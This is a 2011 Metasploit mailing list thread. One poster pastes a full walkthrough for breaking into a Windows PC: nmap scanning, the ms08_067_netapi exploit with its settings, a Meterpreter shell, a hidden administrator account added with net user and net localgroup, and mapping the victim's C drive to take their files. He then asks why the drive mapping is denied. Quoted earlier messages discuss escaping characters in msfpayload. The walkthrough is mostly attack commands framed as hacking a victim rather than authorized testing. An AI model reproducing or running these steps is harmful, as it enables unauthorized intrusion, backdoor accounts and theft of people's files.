Metasploit mailing list archives
Re: Escape characters
From: ravindra kalal <itravin () gmail com>
Date: Fri, 1 Apr 2011 17:14:08 +0530
Hi friends, I have just started using metasploit, i have successfully hacked a pc with the help from (N0F@T3, MinSteRexS), pls find the below instructions which i have followed: -------------------------------------------------- We download nmap (nmap.org) so that we can scan the remote pc. - On the terminal we write: nmap -sS -O <target ip> - If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be. - Now we download Metasploit (metasploit.org) and we open it via the Terminal. - Now that Metasploit is running we start the attack. - We write at the terminal “show exploits” and we get a list of the avaliable exploits. - We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi” - Now we set RHOST to our victims ip: “set RHOST <target ip>” - And RPORT to 445: “set RPORT 445″ - Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again. - OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp” - IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER. - If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx) - Meterpeter is running. We are inside the target pc! - Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i” - If it says “X:\WINDOWS\System32″ then the mission is accomplished. - Now lets create our own admin account. - Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.” - Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”. - You should see again the confirmation message saying: “The command completed successfully.” - Then type “exit” to exit CMD. - OMG!! We made it!!! But how can we steal his files???? - We boot from Windows………. - We go to “Start>Run”, we type “cmd” and we hit ENTER. - Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3″ and hit ENTER. - If that doesn’t work type “net use X: \\<target ip>\C: mypass /user:n0f4t3″ and hit ENTER - Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files. -------------------------------------------------------------------------------- i was successful in creating a user with local administrators right in victims pc but when i am trying to map victims drive i am getting following error : *C:\Documents and Settings\admin>net use R: \\172.16.20.93\c$ 123@456/user:suki System error 5 has occurred. Access is denied. * Pls guide.................. thanks and regards, ravin k On Fri, Apr 1, 2011 at 1:07 PM, <danuxx () gmail com> wrote:
Then, You could try to use msfconsole instead and from there set the Payload options, that will take care of it. Sent via BlackBerry from Danux Network -----Original Message----- From: Eric <dkn4a1 () gmail com> Sender: framework-bounces () spool metasploit com Date: Fri, 1 Apr 2011 12:52:49 To: Jose Selvi<jselvi () pentester es> Cc: <framework () spool metasploit com> Subject: Re: [framework] Escape characters No. I'm not trying to encode the shellcode. Suppose, I want to generate a payload executable with msfpayload for windows/exec payload with parameter CMD=cmd /c start calc & start notepad In this case, obviously I need to escape spaces, \ and & characters, like msfpayload windows/exec CMD=cmd\ \/c\ start\ calc\ \&\ start\ notepad Likewise, which all character I need to escape to make it work perfectly fine? On Fri, Apr 1, 2011 at 12:36 PM, Jose Selvi <jselvi () pentester es> wrote:MSFEncode is who encode the payload without badchars. Badchars depends on wich vulnerability are you exploiting. Each vulnerability has their own badchars so there isn't a single list of universal badchars. Some of them are quite common like 0x00 (end ofstring),but I think there isn't any universal list. What vulnerability are you exploiting? Regards. El 01/04/11 08:53, Eric escribió:Hello all, What all special characters should be escaped with msfpayload? I believe< > ; : ' " / ( ) %& Could I find documentation regarding this somewhere? Thanks in advance.-- Jose Selvi. Security Technical Consultant CISA, CISSP, CNAP, GCIH, GPEN http://www.pentester.es SANS Mentor in Madrid (Spain). September 23 - November 25 SEC560: Network Penetration Testing and Ethical Hacking http://www.sans.org/mentor/details.php?nid=24133http://www.pentester.es/2010/12/nuevo-grupo-y-descuento-para-network.html_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- *Thanks & Regards, ravindra Kalal*
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: Escape characters Jose Selvi (Apr 01)
- Re: Escape characters Eric (Apr 01)
- Re: Escape characters danuxx (Apr 01)
- Re: Escape characters ravindra kalal (Apr 01)
- Re: Escape characters Patrick Webster (Apr 01)
- Re: Escape characters danuxx (Apr 01)
- Re: Escape characters Eric (Apr 01)